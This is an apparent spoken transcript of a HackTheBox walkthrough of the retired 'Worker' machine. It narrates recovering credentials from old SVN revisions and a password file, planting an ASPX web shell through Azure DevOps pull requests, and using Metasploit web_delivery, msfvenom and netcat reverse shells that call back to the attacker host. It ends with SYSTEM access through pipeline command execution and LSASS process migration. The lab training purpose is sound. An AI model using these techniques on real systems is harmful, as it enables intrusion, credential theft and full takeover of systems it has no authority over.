Welcome back to a new week, everyone. This is Justin from Parity InfoSec, and I am here with another retired box from HackTheBox. Today it's going to be Worker. Worker launched back in August of 2020, right around the whole pandemic and everybody getting into lockdown. So really expected it to be more of a enumeration and misconfiguration for remote workers. But this one was even harder than I expected because this is not my area of expertise. This box hits up on Azure cloud services as well as doing some SVN, and I'm going to talk about that a little bit more in depth just because I'm not familiar with it, so I thought I'd share it with the folks that are watching. To do the box, it really doesn't take a lot of tools. There's a little bit of browser, not much. There's going to be the SVN client for command line. You're going to use winPEAS. By choice, I use that. You could probably do it without it just by knowing how you want to manually look for things, but it'll help expedite what I'm going to show you. And then evil-winRM is always a favorite of mine. Not necessary. Again, there's ways to get around it. And we'll talk about that in some of the techniques, because the first thing we're going to talk about would be the enumeration and how to use Apache's SVN service. It's an open repository. We'll talk more. And then by getting into there, we're going to get some credentials to go into the Azure cloud. That cloud is going to have ways of uploading files and running files, running commands, things like that. That's going to be kind of our foothold into the door. And then in that, I'm going to show a couple different ways of getting shell from there. And it's essentially, how can you get shell? How can you get different things from a command line? Because that's what we're kind of given. I'll start with a command shell and then kind of start manipulating just simple Windows command line methodology. So those are the things we're going to talk about. There's a lot to get to, so let's get started. We're going to start with an NMap as always. So we'll do an NMap. This box is 10.10.10.203, and we'll just run a normal NMap for right now just to pull up some ports. So right off the bat, you're going to see there's a port 80 and then there's 3690, which is SVN. So if you're not familiar with it, let's try and run some scripts and versions just to pull down a little bit of information. And just to make it really easy, we're going to say port 80 and 3690. 3690? Yeah. Just to make it a little bit faster. And port 80 is going to be obviously HTTP. And then with SVN, it's going to come back and it's going to give a little bit extra information. So your HTTP 401 unauthorized, it's going to give you a realm of devops.worker.htb. So there's a way that I was going to show you this information, but this is also a simple thing that comes off of just doing your normal scans. If you do your Nmap with scripts, it's going to pull some of this information down. So just keep that in mind. We're going to put devops.worker.htb into the Etsy host. We'll come back to that in a minute. Get all this information about this system. Because it's running IIS, we can get product information. We know that the box is called Worker. And then as you come down here, 3690, it's an SVN serve, so Subversion, and that's Apache. So let's talk about that. Normally, if I do know a little bit more of the technical side, I can get into the nitty-gritty. But this one was a pretty good one to just go after on Wikipedia. So it's Apache Subversion. And there was a nice little Wikipedia page. Here we go. So it's for versioning, software versioning and revision control, open source, and it's made by Apache, obviously. So there's a lot of information on here, but one of the things I found through my investigation is it's basically just a website repository. So it's going to have two different types of storage. There's going to be a file system kind of structure and a database that got rid of the database. So it's going to be a file system as a repository. And so if you're doing it locally, you would put in things like file path. If you're doing it over WebDAV, HTTP, HTTPS, you would use that same information. If you're using a custom SVN protocol on default port 3690, you're going to use SVN:// path, the host and the path. If you're using SSH, you would run SVN plus SSH. So keep this in mind. We're going to need this information here in a little bit. And this is just simple Wikipedia checking. So as you find new things, even the most basic information is going to help you out. But the way that it works is going to kind of build a file system tree. It's going to work like every other drive. And it's going to give you some information and old, I guess, versions. As you see here, you can have different branches. DevOps is the name of the website that we're going to go to. So something you kind of got to get used to is different branches and merges and different versioning. And that's where Subversion helps. So we want to kind of do some enumeration here. So let's go back to the command line. Before we go too far, I want to go ahead and run all ports on this, and I'll show you why in a little bit. But right now we're going to just say SVN. Okay, SVN help. So SVN gives you a command line client built into this version at least, and you can do different commands. So you can add things to the file structure, you can cat things from the file structure, you can do checkout, and then it's got little abbreviations, quick way, some that's very familiar, copy, del, rm. So it should work fairly close to a file structure that you would see on a normal system. And then you've got list, and it can be replaced by ls. So I want to try svn ls, and then what we saw in that Wikipedia, we can just do 10.10.10.203. We don't have to put any ports because it's going to auto detect based on SVN, and it pulled down some information. So there is a folder called dimension.worker.htb, and then you've got a file. So as we saw above, there's a couple different commands you can do. One of them is cat. So we're going to do svn cat, and then really I'll just come up here and do this. Cat, and then we'll put the file here. So move.txt. So this is a note that was left. It says this repository has been migrated and will no longer be maintained here. You can find the latest version at http devops.worker.htb. So that's the same site that we were given before when we were looking at the NMap output. So if we want to open this link, we're going to see it doesn't work. So the first thing we need to do is go ahead and put this information into our host file. So I'll go ahead and copy that to make it a little bit easier, but clear this, sudo nano etc hosts. And then here I will put in 10.10.10.203, tab over, and then paste this in. Additional one that I'm going to put in here just for fun, sometimes I'll put in just the name of the box or the name of the box.htb, just in case you run into that sometime while you're enumerating the box. So let's try and refresh that. And this is where, when we did the NMap, it was coming back with authentication required. So if you said admin, test, that's not going to work. Let's go ahead and say cancel. So it's just giving us unauthorized access. What happens if we go to worker.htb? Since we put that into the system, I do want to go to HTTP. All right. So it is an IIS website, which is what we found out when we did the NMap. So nothing new there. But we do know DevOps has a login. So how are we going to get past that login? Well, let's see if we can find any other information while we're in this file structure. So we were doing list, and we came across this folder called dimension.worker.htb. One way that we can look at it is to just check it out. And by checking out, you're going to download it locally, which is a great way to just rip people's stuff. So let me go into my normal place. So I will make a directory for 203. Let's clean this up and go into it. So 203, and we are going to do SVN. So we're going to do SVN, and then we're going to do checkout, which was CO. And you can see that it pulled everything down. And I want you to see something that's kind of interesting. It says that this right here is revision 5. So the checkout process has a way of checking out different revisions. It's a little strange because when it tries to check it out, if I say checkout, it's going to be tac R and then whatever version. If you say 4, it's going to check out a different version of move.txt. It actually deleted it. So this is add, this is delete. So let's go ahead and pull down 3. So 3 had something. It's called deploy.ps1. So let's cat deploy ps1. So it says the user is Nathan. It says note, we can't have my password here. And then this is a really handy thing. If you've never seen this before, this is how you can run PS credentials, and it allows you to script out different PowerShell commands and include credentials so that you don't have to do an interactive login. If you don't have a full shell, or if you're trying to do something remotely, you can run it all like that. It would be super cool. Well, all right, so they took the password out here. It would normally go right here where it says plain, and then what it does is it converts it to secure string and saves it as password, and then it builds your credential. Let's go ahead and go back a version, say revision 2. So revision 2 shows that they updated deploy.ps1. So let's see. It's the same one. So let's cat deploy ps1, and here you see they did have a password. So we know that Nathan's password is Wendell98. So we're sure as heck gonna try that on our login. Oops. All right. Refresh this. It's gonna be Nathan with an E. Paste it in. And we have access to devops.worker.htb. And this is where you're going to see the Azure DevOps server that is running here. And this is the second thing I am not familiar with when I hit this box. So it's going to be tricky. This box was rated a medium. It's a little strange because what you're going to see is it resets itself, or I guess it cleans itself very, very often. So one of the things you're going to hit here is kind of a race condition with just the way that HackTheBox is keeping the box fresh. So it's going to delete shell. You got to make sure that you get your shell up onto the box, pop your shell, and start working before it gets deleted. So let's take a look at that. This is going to be running Smart Hotel 360. It's a little application, a little website. And you've got different kind of menus over here. One of them is going to be boards. If you're not familiar with DevOps, there's backlogs and sprints. These are kind of user features that people have asked for. They're called work items. So every time somebody updates something in the system, it should be tagged against one of the work items. It's trying to fix one of the things that is on this list. And we'll see that here in a little bit when we start trying to upload things. But repos is where all the files are at. So inside of Smart Hotel 360, there's different repositories. Alpha, Cartoon, Dimension, Lens. There's the Smart Hotel 360. These actually are different subdomains inside of worker. So like alpha per se. Alpha doesn't come with much, but if I try to go to alpha.worker.htb, not going to work, right? So we need to come in here, sudo nano etc hosts alpha.worker.htb. I'm only going to do this for one because I don't want to add all the different repos, but you can add all the different repos and see, and they're different styles essentially. So this one's a little bit more cartoony, you know, there's a electronics kind of theme, spectral, there's just different views. So when I come to alpha, this is the alpha layout, and it just shows you what it's like. But what this also allows us to do is we have a website, and in this repo we have a way to upload files. So we want to try and upload a command shell. What we do know about this is that it is running some aspx, some ASP, it's running IIS. You can find that information if you also do a GoBuster. You're going to find the normal ASP client information. But I want to go ahead and upload. I have a command shell that I really like. It's just command asp.aspx. We're going to load it into alpha, not into the master, but we're just going to call it alpha. And then here you have to match things to a work item. And I'll show you what happens if you don't. And then we're going to create a pull request, but I'm going to show you what happens if we don't there as well. So we set this system in motion, and it's up here. For some reason it's not shown over here, but it is shown over here. So if I come in and I try to build a pipeline, okay, there's alphas in there. Say new build pipeline, and I'm going to build alpha. When it tries to build alpha, say commit directly to the pipe, it says pushes to this branch are not permitted. You must use a pull request to update this branch. So it's just one of those things, if you've never done DevOps, it's a little weird. Now back in this file structure, you can already see it deleted the command shell I added. So if I come back to alpha, I got to upload this command again. And I believe, yeah, so it's already going to say that the branch exists. We will call this parity, and then we want to create a pull request. So it's going to automatically create that pull request for us. We're going to say create. So it drops us into the pull request menu, and if you try to complete it, it's going to kick back and say 2 required branch policies are not passing. And you're going to see them right here. And one of them is the reviewer needs to approve it, which is pretty simple. You can just click approve up here, and it's approved. This one's been deleted again. So it's just something that's going to take a minute, but I want to show you all these things, and then we'll run through it really fast. This one says no work items are linked, and that's the part that I was talking about. You have to have work items here. So if you don't know, you can kind of hunt and peck. You can say 1, you can say 2. Some of this stuff exists. You can say 134, and there's one for that. It doesn't really matter because you just need to tie it to a work item, because nobody can do work that doesn't link back to something. So if I say 134, you can see it cleared up right here. Now I no longer have the option to complete it because it's already been deleted. I have to abandon this. It's really kind of annoying. But you can do all that in the first step when you're uploading the files. So we're going to say upload file. I'm going to say this command shell, and it's just a normal web shell. I want to do it to parity. I think it's going to say it exists already. It doesn't. Okay, so it deleted everything. I can link my work item here. I can create a pull request right here, do those 2 steps, And then the only thing that I should do once I create this is have to approve it. You can see that's the only thing left. Hit approve, and it gives me the option to complete. We want it to merge, no fast forward, but we don't want it to delete the file. So we'll go ahead and uncheck that box, and we're going to allow it to merge. It's completing the pull request. Hopefully we caught it before it deleted. Okay. So it's sitting in here is the merge file, and we need to find this file on the structure. And we know it's going to be inside of alpha because that's where we left it. But it didn't show up. Let's go ahead and take a look at our pull requests. So it says there's nothing. It says it completed this job. We're going to go to it. And it looks good. Now you can go to pipeline and you can go to release. You're seeing that there's a build right here. And you can click release. Now, with that, we're kind of stunted because you can run an empty job, you can run a basic job. It's the only way to publish it. So if I click on that and I say save, it's going to try and save it to the folder, and it's going to say I don't have permissions from pool default. And so that's just a setting in this. Don't know if there's a way to remove it here. We can give that a try and save. Yeah, looks like it's still giving the same error. So it is always going to try and do that. And so there's a couple different ways you can go about it. If I come into here to manage, there's pools. So I can say agent 64, and then you can try and run this, but we don't have access to the box right now. But when I come back here, I see that command.asp.aspx is here. So it just took a minute. So now it's showing up. I apologize for that. It's just an oddity. So this is a normal shell. So if I say pwd, I'm going to get my directory structure. The host name is worker. If I say who am I am IISapppool, default app pool. So it's a very strange user to have. It's not going to give us a whole lot of what we need, but it does give us kind of a leg up in seeing what's available on the box. That is one way to get a shell. There's obviously other ways, and I'll show them a little bit later in this one. But for right now, I want to try and get a foothold in the box because, frankly, it's kind of an annoying box. So let's see what happens when we start running some commands. So let's ls c, and then this one you have to kind of use a /. So c users, and we're going to find out there's an administrator, default public, there's a restorer, and then robisl, robisl, and we'll look at some of the naming convention here in a little bit. But that provides us maybe a user that we're going to want to go after. For this box, it's not usually my favorite, just because coming up in OSCP, you're kind of taught not to use Meterpreter. You got to learn how to use normal command shells and all that stuff. But when I started playing around in Dante, it really became clear that it doesn't matter what you use, just what works. So I want to play around and show a little bit of the MSF process, my favorite tool, which is web delivery, and then we'll go ahead and launch it that way and get our shell. So let's do this. I usually do sudo when I'm doing MSF console, just because if I want to run something on a low number port, it will kick back an error if you don't have admin permissions. All right, so I'm going to search for web delivery. Actually, search web deliv, and it's going to come up this one right here, and it's a script web delivery. It just allows me to run different things. All I have to provide it is a website, and it'll automatically execute different things based on what we put in. So let's go to use to show options. You're going to have some pretty typical commands. This is going to be listen on any address. It's going to start a server on 8080. I don't want to run SSL, but you can if it makes it a little bit more robust when you're having real clients or somebody that you're going up against. It's just going to look more realistic. I'm going to set my lhost to 10.10.14.12, which is my box. And I generally don't like 4444, so I'm actually going to do 9999. I know it doesn't sound like much, but it is to me. So if we say show targets, these are the different options we have. Now we're running against a Windows box. I don't know if it's running Python yet. I don't think it's running PHP because it's running ASP. There's a couple different options here, but the real winner is going to be a PowerShell. So we're going to set our target to 2, and then we're going to start going after our payload. Right now it's set to Python Meterpreter. It's not going to work. So we're going to set payload, Windows, Meterpreter. And one of the things that I had to do for this box, and this shell might go away, so I want to make sure that we check this first. So how do you check for Windows 64 architecture check in PowerShell? And there's 4 different ways on this website. I couldn't get some of them to work, but I found a super easy way. And it was because you were looking at the system environment variables. If you're familiar with Linux, you can just come in here and use a pretty familiar command, env. So it's going to provide you all those environmental variables, and it's going to tell you that stuff like worker. It's going to tell you it's running command, and as you come down, it's going to start saying like, hey, it's an AMD 64. That right there tells me that it's running 64. So when I'm trying to set up my payload, I really want to use the 64 because Meterpreter does not like running a x86 against the 64-bit processor. It just doesn't like it. So we're just going to check this out real quick, and everything looks good. So when you exploit this, it's going to give you a PowerShell command that you can copy and paste, and it's going to set up the listener for the web delivery as well as that 9999 listener that we asked for. So it kind of sets everything up. That's why I wanted to show this, because it's such an easy command for me, and you can see I ran it, it hung, and I have a Meterpreter session. It's that easy. There's much harder ways to do it, but you don't necessarily need to do that. One of the things that I like to do when I get on a box is just make sure that I migrate to a little bit better process if possible. And there's not a whole lot. This W3WP is a nice one, so I'm going to go migrate 3904, because that command shell that we're up against may crash. So we've migrated our process. If you come back here, it stops running, because once you migrate that process, it's going to kill off the other one, and it stops the execution. You'll see that a little bit later with something else that we're running. So with Meterpreter, you can just come in and say shell, who am I, and run it just like that, or you can exit back out, and then you can just do ls, cdc, ls, how about that? There we go. And then you're kind of in that structure right there. So now we have the ability to enumerate some of the system. I'm going to go back into shell. I'm going to start with winPEAS because it's easy, and then I'm going to kind of show you what you can also do if you can't get winPEAS onto the system. We will try to download a file. Now, if I say PowerShell IWR, so Internet Web Request, I need to open another pane here, and then just do a cd var www.html sudo python 3 tac-m http.server port 80. That doesn't work at all, does it? Alright, so I'm running my web server. I can come here and I can say do a web request, Invoke-WebRequest. You can put in tac URI just to say this is the reference, or you can just start typing. So 10.10.14.12, and then on this box I can pull down a lot of stuff. So like I could pull down Netcat, and I could say out file nc.exe, and the first thing it's going to do is it's going to say denied. I don't have permission to write in that file structure. Access to the path C nc.exe is denied. So I got to find a place to store some of my files, and because we're not a normal user, there's not a normal directory to put this stuff. So we got to find a different directory that we can hang out in. So we'll start by going into users and then public, and then I'm going to put some stuff in download. ls, no download, downloads, so cd downloads. Nothing in that folder. We'll do a dir so you can see it that direction as well. So let's try that command again now that we're in, possibly public tends to be more open, and dir. So now I've got Netcat sitting in that box. I can try to run a listener. So nc nblp 8888. We'll come back over here and just do nc 10.10.14 12 8888, and then we're going to give it PowerShell. It's hanging. So when we come back over here, we're sitting in a PowerShell. We're still apppool, but we have a PowerShell window that we can use, and we have Netcat uploaded the box. So that's another way that we're going to be able to get shells later on when we have command execution from the web. But we still need to pull down some files. So since I've got my HTTP server running, I'm just going to do another Invoke-WebRequest to pull down winPEAS. Did not like that. Oh. So when you're running these from PowerShell, it doesn't know what to do because it's not using Internet Explorer. You have to always say, I don't want to interpret it. I want you just to put it into a file. So out file winPEAS.exe. So let's save that. We'll just do a ls. It's sitting right there. So winPEAS. Didn't like that. So winPEAS.exe /. How about we just copy and paste this? All right, so now it's running, and we'll just give it a minute. You can see it loaded up a bunch of stuff, so now we can start scrolling. And this is all the good information. Windows Server 2019. It's running a 64-bit processor in a virtual machine. Here it says there's a ton of exploits available. I saw this, but honestly I didn't even try it. If they work, they work, cool. If they don't, oh well. That wasn't the intent of this box. This box has information out in the open as well as just odd configurations, and it's about how to use the cloud commands and to get execution from that website. So we'll just keep going down. We'll take a look at some of the information that's available. Tons of environmental variables. We don't have to worry about things. Credential guard is not on. Lapse is not installed. We don't have a lot of protections on the system. There's no AV detected, so we shouldn't have to worry about that. But if it was on there, they did whitelist a W drive. So that's kind of interesting. We'll take a look at that. Some of these are just program files, nothing too bad. Consent prompt behavior admin prompt for non-Windows binaries. As long as you're running a Windows binary, it's not going to prompt you for action. So that's another one of those, hey, this box is not asking for you to avoid anything. It's pretty open. If you come down here, it's going to talk about the drives. Again, it's going to say C, and then it's also going to have W. W is an NTFS drive labeled work. It says users have the ability to append data, create directories. So we'll see what's sitting on that drive in a little bit. Oh, and this is where it goes through and it pulls down all the users. And there are a lot of users on this box, a ton. So part of the game was to try and figure out if any of these had special privileges or had access. And when I ran the box the first time, I actually came up with a script, just a for loop, that would loop through different ways to get it in the box, different services, and provide it information. We're going to find some information here in a little bit with passwords, and that's what I did the for loop off of. But that really wasn't necessary because we already took a look at the drive and we saw that there is a user that looks suspicious and available, and that is robisl. Restore is on there, but we're not going to find that password. But this user looks pretty handy. And this is what I took advantage of, and that was the ability to write data and create files inside of the public directory. So users public, and that's exactly where I stored my information because that's another one of those common places you can write to, every user can write to. So now you're seeing things like my winPEAS and other interesting processes, but not important because I put that system on here. Netcat, so it's showing that Netcat back to me on PowerShell. Big red print, it's talking about the different pipelines for Azure, and that's the way that we're going to kind of pivot back and forth a little bit. Tortoise SVN is what system was running. There's also OpenSSH. There's some Git on here, Ming GW64 for running binaries. Just a ton of information here. And again, it's going to talk about the network shares. So these are different shares. Admin C, IPC are normal. W is not. So W is starting to look more and more suspicious. We see that devops.worker.htb is actually listed as .202, not as 203, the box that we're on. So kind of an interesting quirk. You can see the processes that are running here and the ports that are open. So 80, 135, 445, 3690. There's also 5985. So 5985 is a fun one for me. If you do not know 5985, get real familiar with it because it comes up on a lot of Windows boxes, and that is Windows Remote Management. And the best application that I've seen for that one is evil-winRM. Get that, get it. And I'll show you now that we've seen that. If we come back and we look at the full port scan, 5985 did come up. So by running a normal scan, it didn't flag. But when you run a full port scan, it's in a little bit higher, less priority port. So it's only going to run the top 1024, top 1,000 ports or so. This one doesn't always show up, but if you run a full port scan and you see it, there's usually a way to log into it. So we'll take a look at that in a little bit. It does say that the firewall is up, but it doesn't show any deny rules, so it shouldn't be too big of a deal. And we're going to go ahead and call that good. So there's a lot of information that just came out of that. One of it is being the user. So the next user we want to go after, as well as the ability to log in, and the W drive. So let's take a look at the W drive. So if I come on here, there's going to be a folder for agents, Azure DevOps data, sites, and SVN repos. So let's go to sites. And this is where you're going to see alpha, cartoon, dimension, lens, solid state, spec. These are the ones that we built. So if I go into alpha, my file that I was using is now deleted. But because we are able to get a Meterpreter session, we are able to keep that persistence despite them wiping those command shells that are being uploaded to the website. All right, so that's the sites. What about SVN repos? So we know that those are the backups. And there's one called www. There's one little file. It's 2 for a length. That's pretty short. Let's say cat format. See if it says. It just says 5. If we say cat readme, it's just going to say this kind of information. So it's a Subversion repository. Use SVN admin, SVN look to examine it. Do not add, delete, or modify files here unless you know how to avoid corrupting. Pretty basic memo. I want to go after this directory because it looks like config. So cd conf, and inside you have a file called auths with a Z, a file called password, and a file called svnserve.conf. Let's take a look at all those. So cat auths, and this one is an authorization file for SVN. It's going to say there's a person named Joe. These are all commented out. So Joe, Harry, and Sally. Harry, Sally, and Joe. It's just showing you how you do authorization if you're going to do it through here by users. Let's take a look at SVN serve. This is going to be the full configuration for the server. So password DB is going to be the file password. So this is where the information is going to be for the passwords. Very handy. It's not using that auths file, so it's commented out. So the only thing that's in this is saying go look at passwords. So cat password, and that is users and passwords. Users and passwords. I'm gonna skip to this one, who is obviously a target we're looking for. So robisl with wolves 11. So I just got done talking about different ways that you can log into the system. Let's try to use evil-winRM. So evil-winRM, you're going to say the IP, which is 10.10.10.203. You're going to say user, which is robisl, and the password is wolves 11. And we are in. If we look, there's nothing in its documents. Let's go into desktop. Inside desktop is user, so cat user.txt, and we've got our user. So not too bad. Little lengthy process to get in, but I did explain some of the things as we were going along. So we've got that first user. What else can we do with this first user besides just logging in here? You can do enumeration on Windows, but this box makes you go back and go after the website. So let's go back to this pipeline area. It's actually Natalie Henley, not Nathen, it's Nat Hen. Let's see if we can sign in as somebody else. I'm gonna leave this page, and robisl wolves 11 doesn't want to do that. I am going to clear it from here back and just try to go straight into DevOps. robisl wolves 11. For some reason, the way that it's built, you gotta go back to the main root. If you don't do that, you will sit there pounding your head against the wall. But we are in a new login. It's Robin Islip. Rob Isl. All right. So this is a different website called Parts Unlimited. Parts Unlimited is their e-commerce website that's running. But it's going to be a very similar process to what we did before, because you've got repos with files. There's build files. You can upload a file. You can mess around with some stuff. Let's see if we can try something else. So inside of here, you can build pipelines. Inside of pipelines, you have repos, Parts Unlimited, and you can do what's called a starter pipeline. So start with minimal pipeline, customized to build and deploy your code. So here, it's going to say echo hello world. So if I say save and run, commit, and we're going to call this test 1. I want it to try and run this script and get an echo hello world. It's going to kick back and say could not find a pool with name default. We had that problem before. If I try to authorize resources, I don't have the ability to do that. Well, what else can we do? I'm going to go back in here and I'm going to build a new one. Will it let me edit this one? Rebuild. Oh, it's all kinds of angry. All right, so we'll just build a new one. Same process, and we're going to pick starter pipeline, and it's going to say echo hello world. We're going to take pool. I don't know what else to put there, so we're just going to take it off, because if you saw in the previous one, there was no red asterisk. I don't think it needs it. We're going to go ahead and it's going to run through the pipeline. It's going to try and build this whole thing, and then hopefully it's going to run this one-liner. And then there's also this, so you can run multiple line script. So let's see if we can play around with this. We're going to call this test 2. So it takes a minute because it's going to try and build the entire site again. So it's going to run through the process, go through the objects, build all the objects. When it gets done with that, it will run the one-line script, the multi-line, and then it'll try and check out. So it's kind of a one-shot process. So it looks like it finished that, and it's kind of finalizing right now. Running a little slow. While this is working, maybe we can go ahead and start building that MSF Venom payload, just to do it. So we're sitting in 203, so we'll say MSF Venom. The payload is going to be the same payload we ran before, so Windows x64 Meterpreter reverse underscore TCP. We're going to run lhost equals of 10.10.14.12, lport equals, I believe it was 999. None of that matters really. I want to run it as, this time, exe, and we'll go ahead and output it to We'll put it right here. We'll call it worker.exe. So this will be kind of, if you can just upload a file, just drop this on the system and then run it from there. You can run that same PowerShell like we did before, and you can drop that into these jobs as well. This one's super annoying. Now that I've got this file built, I can pull it down through a web request. I can pull it down through this upload opportunity. Updated just now. So I don't know if it's updating these pull requests or not. These are all kind of waiting. So we'll go ahead and try and go through this process. Maybe that's what it's hanging out, waiting on. So this one, I think there's 184. Man, doesn't want to load suggestions either. It's broke all the way around. Let's take a look at the board. Here we go. So there's a 184. These are, there's only 6 of them out there, so you can come in here and take a look. So I like the ones that say to do because it's kind of expected. You can kind of hide in those. So if I come back to the pull request, there should be an opportunity to say I want 184, but I'm starting to lose faith in this system. .184. There it goes. So now we've got that in. There's the ability, but it says merge must finish before the pull can be completed. So just is not going to let me build that same way. I'm going to skip ahead a step and I'm going to just say, who am I? If I can get this silly thing to run, all right, so now there's an agent. So now it should be connecting to run it, and it's running it as a service. So it's building it. And hopefully this time we'll get through all the way to the end. Resolve deltas, there it goes. Now it's running the one-line script, and now it's the multi-line, whatever. But you can come back and you can take a look at the one line. And you can say it generated the script, who am I? It ran this command, which resulted in it saying anti-authority system. So we have, from this website, remote code execution by just a simple command line, and we're getting it to run as anti-authority system. So this is our jam. So let's go ahead and try another build. Come in here. I'll take all this out because none of this really matters. None of this really matters. I'm not running a multi-line script. I can, but it's always fun just to try and get it into one. So I built the Venom. Let's see if we can upload it. So this is sitting in 203 and it's called worker.exe. I've got an evil-winRM I can use. I've got the PowerShell that we pulled down from our interpreter sessions have died, but we do have our PowerShell and we have our command shell. So it opened, closed. We'll go ahead and terminate that. But if you look at jobs, it's still listening. So if somebody were to hit that 9999 with this payload, it'll activate, which is what we made our payload in MSF Venom. So that's kind of the reason I did it the way that I did. Because this is easy on evil-winRM, I'll show you this function as well. So if you go into public downloads, see, I don't have access to public because of the user I am, which is really confusing. But to be honest, the administrator would have access to my files. So we'll go back into robisl, and we'll go into my downloads as this user. And because this is evil-winRM, it actually has a function to upload downloads. You can just say upload, and then you're going to say the source file, which is going to be home parity, and it does do tab auto complete. So we're going to say 203, and then we're going to say worker.exe, and then we're going to say just put it here into the downloads. And it's going to automatically upload it for us. Really cool function. I love that one. So you don't have to mess around with the Invoke-WebRequest. You can just say upload this file. Do an ls. It's sitting right there. So that is our payload. And it's sitting here. So I'm going to go ahead and copy this. And we're going to see if we can get it to run back over here. So if I paste this in here and I say worker.exe, and then I save and run, commit, and this one we're going to say Venom. Save and run, and hopefully you can get an agent this time. We got one. So it's going through the process of checking it out. Build. All right. Now it's going to run that one-liner, and it started and it didn't do anything. And that's because it hung. And it hung because we now have a session. If I go into 3, I now have more access as NT authority, NT authority system, local service, network service. So I want to try and migrate over soon before I lose that shell. So we're going to go to LSASS because that's always a fun one, 680. So migrate 680. And that migrated, and what I want to show you is it completed. Once we migrated out and the process killed, it was able to complete the function in the web page. So everything was waiting on that. If I come into shell, I say, who am I? NT authority system. So I'm sitting in the right spot. I can just go into cd, do that. So cd users, cd administrator, cd desktop, ls, we'll do dir, cat root.txt. It's not good. Oh, it did. Cool. And we've got our root.txt. So we'll go ahead and just cap it at that. So we got to play around with SVN a little bit today. Enumerate the system, pull down files by using the checkout function, and then turn around and implement all that through the Azure web portal and how it interfaces and checks out and loads and updates all that information, kind of automated through a GUI interface. With that, we're able to show a couple different routes to shell between Meterpreter and Netcat in there. Now for right now, I do want to thank the maker of this box, Ikinis. Really good box. It was not something I've ever seen before, so it was a lot of learning, reading, brushing up on some stuff, but great box. This was a tremendous week for me. Everybody that's watching this, I appreciate if you watched Compromised. That box doubled the throughput on this channel, came up with tons of new subscribers. If you are new to this, please hit that subscribe button just like everybody else did last week. Keep the channel growing. I can make more content and start doing a little bit more customized stuff for you if we just keep pushing the envelope on what you're looking for and what's available out there. For right now, I want to say have a great weekend. Have a great week. We'll see you next time.